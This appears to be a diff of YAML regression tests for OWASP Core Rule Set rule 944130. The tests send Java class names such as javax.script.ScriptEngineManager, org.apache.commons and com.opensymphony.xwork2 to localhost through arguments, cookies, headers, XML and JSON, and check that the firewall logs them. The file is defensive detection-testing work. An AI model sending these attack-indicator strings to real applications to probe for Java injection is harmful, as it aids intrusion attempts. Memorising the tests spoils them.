"application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-385 - desc: "Argument test includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-386 - desc: "Argument name includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-387 - desc: "Cookie test includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-388 - desc: "Cookie name includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-389 - desc: "Request header test includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-390 - desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-391 - desc: "XML element value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-392 - desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-393 - desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-394 - desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-395 - desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-396 - desc: "Argument test includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-397 - desc: "Argument name includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-398 - desc: "Cookie test includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-399 - desc: "Cookie name includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.apache.commons=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-400 - desc: "Request header test includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-401 - desc: "XML attribute value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-402 - desc: "XML element value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-403 - desc: "Nested XML element value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-404 - desc: "Content-Type text/plain includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-405 - desc: "Content-Type application/json arg value includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-406 - desc: "Content-Type application/json arg name includes keyword org.apache.commons" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-407 - desc: "Argument test includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-408 - desc: "Argument name includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-409 - desc: "Cookie test includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-410 - desc: "Cookie name includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-411 - desc: "Request header test includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-412 - desc: "XML attribute value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-413 - desc: "XML element value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-414 - desc: "Nested XML element value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-415 - desc: "Content-Type text/plain includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-416 - desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-417 - desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" +meta: + author: "spartantri" + enabled: true + name: "944130.yaml" + description: "Positive tests for rule 944130" +tests: + - test_title: 944130-1 + desc: "Argument test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-2 + desc: "Argument name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-3 + desc: "Cookie test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-4 + desc: "Cookie name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-5 + desc: "Request header test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-6 + desc: "XML attribute value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-7 + desc: "XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-8 + desc: "Nested XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-9 + desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-10 + desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-11 + desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-12 + desc: "Argument test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-13 + desc: "Argument name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-14 + desc: "Cookie test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-15 + desc: "Cookie name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 